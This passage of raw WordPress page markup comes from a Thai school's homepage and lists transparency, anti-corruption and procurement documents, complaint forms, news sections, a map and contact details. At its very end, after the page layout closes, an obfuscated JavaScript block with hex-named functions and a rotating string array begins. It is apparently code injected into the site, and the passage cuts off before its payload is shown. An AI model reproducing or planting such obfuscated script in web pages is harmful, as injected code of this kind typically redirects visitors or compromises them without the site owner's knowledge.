data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม  No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 